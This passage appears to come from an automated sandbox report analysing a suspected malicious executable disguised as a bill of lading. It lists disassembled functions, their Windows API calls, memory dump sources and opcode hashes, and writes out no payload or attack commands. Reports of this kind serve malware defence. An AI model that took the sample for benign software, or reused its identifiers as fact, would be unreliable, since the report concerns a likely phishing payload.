                                                                                                                      • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 00454760
                                                                                                                      • GetClientRect.USER32(?,?), ref: 0045476F
                                                                                                                      • PostMessageW.USER32(?,00000005,00000000,?), ref: 0045479E
                                                                                                                      • SetTimer.USER32(?,0000040A,?,00000000), ref: 004547E9
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3869813825-0
                                                                                                                      • Opcode ID: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                      • Instruction ID: 4e77de65cc6986e78e6be143d0a4b9e7f39e78804b6f4fc71fe9e35dfcfd5046
                                                                                                                      • Opcode Fuzzy Hash: d6d25c813e590b752cbfd9858452ff05e3d443d6a6ce6916d89e520ab15b373f
                                                                                                                      • Instruction Fuzzy Hash: 8C616D71604701AFD320DF68CD88F2BB7E8AB88709F004E1DF98697691D7B8E849CB55
                                                                                                                      Function 00458D1C Relevance: 25.6, APIs: 17, Instructions: 112COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8A), ref: 00458D2D
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00458D3A
                                                                                                                      • LoadCursorW.USER32(00000000,00007F03), ref: 00458D47
                                                                                                                      • LoadCursorW.USER32(00000000,00007F8B), ref: 00458D54
                                                                                                                      • LoadCursorW.USER32(00000000,00007F01), ref: 00458D61
                                                                                                                      • LoadCursorW.USER32(00000000,00007F81), ref: 00458D6E
                                                                                                                      • LoadCursorW.USER32(00000000,00007F88), ref: 00458D7B
                                                                                                                      • LoadCursorW.USER32(00000000,00007F80), ref: 00458D88
                                                                                                                      • LoadCursorW.USER32(00000000,00007F86), ref: 00458D95
                                                                                                                      • LoadCursorW.USER32(00000000,00007F83), ref: 00458DA2
                                                                                                                      • LoadCursorW.USER32(00000000,00007F85), ref: 00458DAF
                                                                                                                      • LoadCursorW.USER32(00000000,00007F82), ref: 00458DBC
                                                                                                                      • LoadCursorW.USER32(00000000,00007F84), ref: 00458DC9
                                                                                                                      • LoadCursorW.USER32(00000000,00007F04), ref: 00458DD6
                                                                                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00458DE3
                                                                                                                      • LoadCursorW.USER32(00000000,00007F89), ref: 00458DF0
                                                                                                                      • GetCursorInfo.USER32 ref: 00458E03
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Cursor$Load$Info
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2577412497-0
                                                                                                                      • Opcode ID: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                      • Instruction ID: 36b4ee280ed0253346847529aeb00c95e660e1b7f2a6688567eec4957a26740b
                                                                                                                      • Opcode Fuzzy Hash: 0c78b259ae472df09145ddf792cd37f85d2c816b82f1d484569203a38ef646a1
                                                                                                                      • Instruction Fuzzy Hash: D9311671E4C3156AE7509F758C5AB1BBEE0AF40B54F004D2FF2889F2D1DAB9E4448B86
                                                                                                                      Function 00469681 Relevance: 24.8, APIs: 13, Strings: 1, Instructions: 253windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 004696CC
                                                                                                                      • GetFocus.USER32 ref: 004696E0
                                                                                                                      • GetDlgCtrlID.USER32(00000000), ref: 004696EB
                                                                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046973F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessagePost$CtrlFocus
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1534620443-4108050209
                                                                                                                      • Opcode ID: 3dab727c688772619e9efc5d23afb6fcae73775eddc560d175f3e695e52b8611
                                                                                                                      • Instruction ID: 7d80af5808d25915b866e76daf530f36ef8b085de22dc1c7fc8dbb607ae8adb7
                                                                                                                      • Opcode Fuzzy Hash: 3dab727c688772619e9efc5d23afb6fcae73775eddc560d175f3e695e52b8611
                                                                                                                      • Instruction Fuzzy Hash: 1591E1B1604301ABD710DF14D884BABB7A8FB89714F004A1EF99497391E7B4DC49CBAB
                                                                                                                      Function 004680EB Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 204windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00468107
                                                                                                                      • GetMenuItemInfoW.USER32(?,00000007,00000000,?), ref: 00468190
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 00468227
                                                                                                                      • DeleteMenu.USER32(?,00000005,00000000), ref: 004682B8
                                                                                                                      • DeleteMenu.USER32(?,00000004,00000000), ref: 004682C1
                                                                                                                      • DeleteMenu.USER32(?,00000006,00000000,?,00000004,00000000), ref: 004682CA
                                                                                                                      • DeleteMenu.USER32(00000000,00000003,00000000,?,00000006,00000000,?,00000004,00000000), ref: 004682D3
                                                                                                                      • GetMenuItemCount.USER32 ref: 004682DC
                                                                                                                      • SetMenuItemInfoW.USER32 ref: 00468317
                                                                                                                      • GetCursorPos.USER32(00000000), ref: 00468322
                                                                                                                      • SetForegroundWindow.USER32(?), ref: 0046832D
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,00000000,00000006,?,00000000,?,?,00000006,00000000,?,00000004,00000000), ref: 00468345
                                                                                                                      • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468352
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 3993528054-4108050209
                                                                                                                      • Opcode ID: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                                                                      • Instruction ID: a450cccb4b36e122d1eca3afa35c85d1e57e2007e4dd5bc50ce81cada7f4397f
                                                                                                                      • Opcode Fuzzy Hash: 96134d5ccf85dd2c353584f61e992c1258bc53944db1005dc2f45aa542165571
                                                                                                                      • Instruction Fuzzy Hash: 3C71C070648301ABE3309B14CC49F5BB7E8BF86724F244B0EF5A5563D1DBB9A8458B1B
                                                                                                                      Function 0046F2B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 185windowfileCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DragQueryPoint.SHELL32(?,?), ref: 0046F2DA
                                                                                                                        • Part of subcall function 00441CB4: ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                                                        • Part of subcall function 00441CB4: GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                                                        • Part of subcall function 00441CB4: PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                                                      • SendMessageW.USER32(?), ref: 0046F34C
                                                                                                                      • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0046F355
                                                                                                                      • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0046F37F
                                                                                                                      • _wcscat.LIBCMT ref: 0046F3BC
                                                                                                                      • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0046F3D1
                                                                                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 0046F3E3
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F3F1
                                                                                                                      • SendMessageW.USER32(?,000000B1,?,?), ref: 0046F40E
                                                                                                                      • DragFinish.SHELL32(?), ref: 0046F414
                                                                                                                      • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0046F4FC
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Drag$Query$FileRect$ClientFinishPointProcScreenWindow_wcscat
                                                                                                                      • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                                                      • API String ID: 4085615965-3440237614
                                                                                                                      • Opcode ID: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                      • Instruction ID: d92027b63b9478c52a8b17f069484fb886a707b260a555cedefccfc898d4b85d
                                                                                                                      • Opcode Fuzzy Hash: e6dc8860684545ee98a9b737372e313d8034606243f87d3f07a4344f64e9a130
                                                                                                                      • Instruction Fuzzy Hash: 596170716043009BD700EF54D885E5FB7A8FFC9714F104A2EF99097291D7B8A949CBAA
                                                                                                                      Function 0044B988 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wcsicoll
                                                                                                                      • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                                                                      • API String ID: 3832890014-4202584635
                                                                                                                      • Opcode ID: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                      • Instruction ID: bf73cd225697d97a5a257e466bf5c8c79b4efa22739c650e03c6b1f9c6e9338c
                                                                                                                      • Opcode Fuzzy Hash: 3f0b73fdde0a53fb0a00575eab05b85141dd4a2dcfcc4ab19f269ee93bd0b8a8
                                                                                                                      • Instruction Fuzzy Hash: 1D01616160562122FE11322A7C03BDF15898F5139AF14447BFC05F1282FF4DDA8692EE
                                                                                                                      Function 00466999 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 312COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 004669C4
                                                                                                                      • _wcsncpy.LIBCMT ref: 00466A21
                                                                                                                      • _wcsncpy.LIBCMT ref: 00466A4D
                                                                                                                        • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                        • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                      • _wcstok.LIBCMT ref: 00466A90
                                                                                                                        • Part of subcall function 004142A3: __getptd.LIBCMT ref: 004142A9
                                                                                                                      • _wcstok.LIBCMT ref: 00466B3F
                                                                                                                      • _wcscpy.LIBCMT ref: 00466BC8
                                                                                                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00466CFE
                                                                                                                      • _wcslen.LIBCMT ref: 00466D1D
                                                                                                                      • _memset.LIBCMT ref: 00466BEE
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      • _wcslen.LIBCMT ref: 00466D4B
                                                                                                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00466D9E
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcslen$FileName_memset_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                                                                                                      • String ID: X$HH
                                                                                                                      • API String ID: 3021350936-1944015008
                                                                                                                      • Opcode ID: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                                                                      • Instruction ID: 73e83d7ea4d12cbe09e247b0b8120e99e9ae8af51722f6ce2f45a1bbad6557a4
                                                                                                                      • Opcode Fuzzy Hash: b06cb37d3db4ad53d3a41f94d3d7a052046d00add24c9c6de48b5fd017d77e84
                                                                                                                      • Instruction Fuzzy Hash: D1C1B2715043408BC714EF65C981A9FB3E4BF84304F15892FF949AB292EB78E905CB9B
                                                                                                                      Function 0045F48E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 226windowsleepCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0045F4AE
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F519
                                                                                                                      • SetMenuItemInfoW.USER32(00000008,00000004,00000000,?), ref: 0045F556
                                                                                                                      • Sleep.KERNEL32(000001F4,?,?,00000000,?), ref: 0045F568
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: InfoItemMenu$Sleep_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1504565804-4108050209
                                                                                                                      • Opcode ID: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                                                                      • Instruction ID: 9e8996cb251b45e9fd8013479734a73363ce4640cf951279a7d2fdadd0934edb
                                                                                                                      • Opcode Fuzzy Hash: d1fae1760d081b6b8cddc0049297ea6fd0734e9abca2e90a1ac85592b3d85e38
                                                                                                                      • Instruction Fuzzy Hash: E171E3711043406BD3109F54DD48FABBBE8EBD5306F04086FFD8587252D6B9A94EC76A
                                                                                                                      Function 004556F8 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 216COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • DestroyWindow.USER32(?,004A83D8,?), ref: 00455800
                                                                                                                      • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 00455847
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateDestroy
                                                                                                                      • String ID: ,$tooltips_class32
                                                                                                                      • API String ID: 1109047481-3856767331
                                                                                                                      • Opcode ID: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                      • Instruction ID: af4df8b80438f92fd5356fe82daba85812243c44dff517d7eb602cf52e2cfce3
                                                                                                                      • Opcode Fuzzy Hash: 0ca5ab61cf6a2cad142a114e1c8ac043728d1bef212d4075191e352a737c6d07
                                                                                                                      • Instruction Fuzzy Hash: BF719075244704AFE320DB28CC85F7B77E4EB89700F50491EFA8197391E6B5E905CB59
                                                                                                                      Function 0045CBFD Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 193COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _wcsncpy.LIBCMT ref: 0045CCFA
                                                                                                                      • __wsplitpath.LIBCMT ref: 0045CD3C
                                                                                                                      • _wcscat.LIBCMT ref: 0045CD51
                                                                                                                      • _wcscat.LIBCMT ref: 0045CD63
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0045CD78
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CD8C
                                                                                                                      • GetFileAttributesW.KERNEL32(?), ref: 0045CDD0
                                                                                                                      • SetFileAttributesW.KERNEL32(?,?), ref: 0045CDE6
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CDF8
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE08
                                                                                                                      • _wcscpy.LIBCMT ref: 0045CE14
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0045CE5A
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 60713673-438819550
                                                                                                                      • Opcode ID: 85b142244d1ccf5c4d3c1cee1eef160739ab4044d21967f155d0975fbe5026aa
                                                                                                                      • Instruction ID: 8cd893c5bfa72372037dc369ee999379159c68fad848afe37117942e2b211ff8
                                                                                                                      • Opcode Fuzzy Hash: 85b142244d1ccf5c4d3c1cee1eef160739ab4044d21967f155d0975fbe5026aa
                                                                                                                      • Instruction Fuzzy Hash: 3A51B4B61043419FD735EB58C885AEB73A4EB84306F44882FEDC983242D67D998E875F
                                                                                                                      Function 0045510D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 115windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 00455127
                                                                                                                      • GetMenuItemInfoW.USER32 ref: 00455146
                                                                                                                      • DeleteMenu.USER32(?,?,00000000), ref: 004551B2
                                                                                                                      • DeleteMenu.USER32(?,?,00000000), ref: 004551C8
                                                                                                                      • GetMenuItemCount.USER32(?), ref: 004551D9
                                                                                                                      • SetMenu.USER32(?,00000000), ref: 004551E7
                                                                                                                      • DestroyMenu.USER32(?,?,00000000), ref: 004551F4
                                                                                                                      • DrawMenuBar.USER32 ref: 00455207
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045564E
                                                                                                                      • DeleteObject.GDI32(?), ref: 0045565C
                                                                                                                      • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                                                      • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Delete$Destroy$ItemObject$CountDrawIconInfoWindow_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1663942905-4108050209
                                                                                                                      • Opcode ID: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                      • Instruction ID: b4bdd7d0bd4ee66815c45afb4cba49e6688c1fb7c5fb2b704b87d0eb3faa17d4
                                                                                                                      • Opcode Fuzzy Hash: 9367fca2e423954c8e95e5664296e443175f4f0a3dc8af8de701f007cae6aaa4
                                                                                                                      • Instruction Fuzzy Hash: F4413B70600A01AFD715DF24D9A8B6B77A8BF44302F40891DFD49CB292DB78EC44CBA9
                                                                                                                      Function 00415C25 Relevance: 22.7, APIs: 15, Instructions: 236COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __get_daylight__invoke_watson$__gmtime64_s$__getptd_noexit
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1481289235-0
                                                                                                                      • Opcode ID: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                      • Instruction ID: 11750150b5911b8a2d77b888e51b7102539fbc40f42687a9f62e69b5342e6946
                                                                                                                      • Opcode Fuzzy Hash: 0c2ddcf2cfad548662a25bd64df7f8cdb197bd458fe0989c9b03f034f06c5664
                                                                                                                      • Instruction Fuzzy Hash: 8461B372B00B15DBD724AB69DC81AEB73E99F84324F14452FF011D7682EB78DA808B58
                                                                                                                      Function 0046FB53 Relevance: 22.7, APIs: 15, Instructions: 176windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 0046FB61
                                                                                                                      • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 0046FB7A
                                                                                                                      • SendMessageW.USER32 ref: 0046FBAF
                                                                                                                      • SendMessageW.USER32 ref: 0046FBE2
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001), ref: 0046FC1B
                                                                                                                      • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0046FC3E
